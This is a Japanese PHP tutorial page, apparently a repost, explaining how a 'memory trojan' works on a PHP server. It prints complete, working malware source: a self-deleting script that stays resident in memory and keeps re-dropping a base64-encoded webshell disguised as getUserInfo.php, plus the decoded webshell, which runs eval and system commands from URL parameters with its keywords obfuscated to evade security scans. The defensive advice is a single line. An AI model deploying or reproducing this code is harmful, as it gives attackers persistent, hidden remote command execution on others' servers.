ホームページ > バックエンド開発 > PHPチュートリアル > PHP メモリ トロイの木馬ウイルスの実装原理を分析します。

PHP メモリ トロイの木馬ウイルスの実装原理を分析します。

藏色散人
リリース: 2023-04-11 08:14:01
転載
3619 人が閲覧しました

はじめに

メモリ トロイの木馬は、メモリ内で実行されるトロイの木馬ウイルスであり、コード エンティティはありません。メモリ トロイの木馬は、高度に隠蔽され、検出が難しく、殺すことができません (一般に不死の馬として知られています)。

ネットワーク セキュリティ業界には、強力なバレル効果があります。システムはブラックハットと戦い、その結果はセキュリティの最も弱い部分に依存します。ブラックハットとホワイトハットの勝敗は、攻撃のレベルと隠蔽と破壊のレベルによって異なります。

本文では、任意のファイルのアップロードやソースに近い攻撃によって悪意のあるコードが運用サーバーにアクセスできるようになったのかどうかについては説明していません。

ウイルス ソース コード (非常に単純)

<?php
//设置脚本不超时
set_time_limit(0);ignore_user_abort(true);
//删除文件本体
@unlink(__FILE__);
//给木马病毒起一个迷惑性的名字
$file = &#39;./getUserInfo.php&#39;;
//死循环常驻内存。释放木马文件
while(true) {
 if(! file_exists($file)) @file_put_contents($file, base64_decode(&#39;PD9waHAKaWYoJGUgPSBAJF9HRVRbJ2UnXSkgewogICAgJGZ1bmMgPSBAY3JlYXRlX2Z1bmN0aW9uKG51bGwsIGJhc2U2NF9kZWNvZGUoJ1pYWmhiQ2dpJykgLiAkZSAuIGJhc2U2NF9kZWNvZGUoJ0lpazcnKSk7CiAgICAkZnVuYygpOwp9CgppZigkcyA9IEAkX0dFVFsncyddKSB7CiAgICAkZiA9IHN0cl9yZXBsYWNlKCd4JywgJycsICd4eHhzeHh5eHN4eHh4eHh0eHhleHh4bXh4eHh4eHh4Jyk7CiAgICAkZigkcyk7Cn0=&#39;));
 sleep(60);
}
ログイン後にコピー

ウイルス本体を解放する

<?php
//以下代码实现了eval关键字和system函数的伪装
//eval($_GET[&#39;e&#39;]);
if($e = @$_GET[&#39;e&#39;]) {
    $func = @create_function(null, base64_decode(&#39;ZXZhbCgi&#39;) . $e . base64_decode(&#39;Iik7&#39;));
    $func();
}
//system($_GET[&#39;s&#39;]);
if($s = @$_GET[&#39;s&#39;]) {
    $f = str_replace(&#39;x&#39;, &#39;&#39;, &#39;xxxsxxyxsxxxxxxtxxexxxmxxxxxxxx&#39;);
    $f($s);
}
ログイン後にコピー

手順

  • 上記の重要な機密コードは、さまざまなセキュリティ スキャンを回避するためにエンコードされています。

  • ウイルス サンプルは実行されると、それ自体を削除し、メモリ内で長時間実行されます。

  • リリースされたトロイの木馬が検出されて削除された場合でも、同じファイルが生成されます。

#解決策

プロセスを強制終了した後、リリースされたトロイの木馬ファイルを削除します。

推奨: 「

PHP ビデオ チュートリアル

以上がPHP メモリ トロイの木馬ウイルスの実装原理を分析します。の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

関連ラベル:
php
ソース:learnku.com
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
最新の問題
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート